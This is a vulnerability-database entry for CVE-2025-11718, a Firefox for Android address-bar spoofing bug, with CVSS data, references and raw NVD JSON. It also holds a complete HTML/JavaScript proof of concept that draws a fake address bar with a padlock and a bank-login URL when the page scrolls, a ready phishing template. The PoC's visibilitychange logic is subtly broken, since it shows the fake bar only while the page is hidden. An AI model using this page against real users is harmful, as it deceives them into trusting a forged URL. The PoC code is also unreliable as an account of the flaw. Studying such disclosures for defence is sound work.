Security Vulnerability Report
CVE-2025-11718 CVSS 6.5 MEDIUM

CVE-2025-11718

Published: 2025-10-14 13:15:38
Last Modified: 2026-04-13 15:16:41

Description

When the address bar was hidden due to scrolling on Android, a malicious page could create a fake address bar to fool the user in response to a visibilitychange event. This vulnerability was fixed in Firefox 144.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - NOT VULNERABLE
Mozilla Firefox < 144 (Android)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-11718 PoC: Firefox Android Address Bar Spoofing -->
<!-- This PoC demonstrates how a malicious page can spoof the address bar -->
<!-- when the real address bar is hidden due to scrolling on Android Firefox -->
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Loading...</title>
  <style>
    * { margin: 0; padding: 0; box-sizing: border-box; }
    body {
      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
      height: 300vh; /* Force scrollable content to hide address bar */
      background: #ffffff;
    }
    /* Fake address bar styling to mimic Firefox on Android */
    #fake-address-bar {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      right: 0;
      height: 56px;
      background: #f9f9fb;
      border-bottom: 1px solid #e0e0e0;
      padding: 8px 12px;
      align-items: center;
      z-index: 999999;
      box-shadow: 0 2px 4px rgba(0,0,0,0.1);
    }
    #fake-address-bar .url-container {
      flex: 1;
      background: #ffffff;
      border: 1px solid #d0d0d0;
      border-radius: 18px;
      padding: 8px 14px;
      display: flex;
      align-items: center;
      gap: 8px;
      font-size: 14px;
      color: #333;
    }
    #fake-address-bar .lock-icon { color: #128a0e; font-size: 14px; }
    .content { padding: 20px; margin-top: 60px; }
    .scroll-trigger {
      height: 100vh;
      display: flex;
      align-items: center;
      justify-content: center;
      color: #666;
      font-size: 16px;
    }
  </style>
</head>
<body>
  <!-- Fake address bar element -->
  <div id="fake-address-bar">
    <div class="url-container">
      <span class="lock-icon">🔒</span>
      <span id="fake-url">https://www.secure-bank-login.com/account</span>
    </div>
  </div>

  <!-- Page content to force scrolling -->
  <div class="content">
    <h1>Welcome to Our Service</h1>
    <p>Please scroll down to continue...</p>
  </div>
  <div class="scroll-trigger">⬇ Scroll Down ⬇</div>
  <div class="scroll-trigger">⬇ Keep Scrolling ⬇</div>

  <!-- Malicious script to exploit visibilitychange event -->
  <script>
    // Listen for visibility change events triggered when address bar hides
    document.addEventListener('visibilitychange', function() {
      if (document.hidden) {
        // When page becomes hidden (address bar hides), show fake address bar
        document.getElementById('fake-address-bar').style.display = 'flex';
      } else {
        // Hide fake address bar when real one is visible
        document.getElementById('fake-address-bar').style.display = 'none';
      }
    });

    // Additional: Also trigger on scroll as fallback
    window.addEventListener('scroll', function() {
      const fakeBar = document.getElementById('fake-address-bar');
      if (window.scrollY > 50) {
        // Show fake address bar when user scrolls (real one hides)
        fakeBar.style.display = 'flex';
      } else {
        fakeBar.style.display = 'none';
      }
    });
  </script>
</body>
</html>

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1980808 - Issue Tracking, Permissions Required
https://www.mozilla.org/security/advisories/mfsa2025-81/ - Vendor Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11718", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:38.150", "lastModified": "2026-04-13T15:16:41.083", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "When the address bar was hidden due to scrolling on Android, a malicious page could create a fake address bar to fool the user in response to a visibilitychange event. This vulnerability was fixed in Firefox 144."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "DC554AD6-8F3F-4C92-85EA-C204204E9E9D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", 
"matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1980808", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}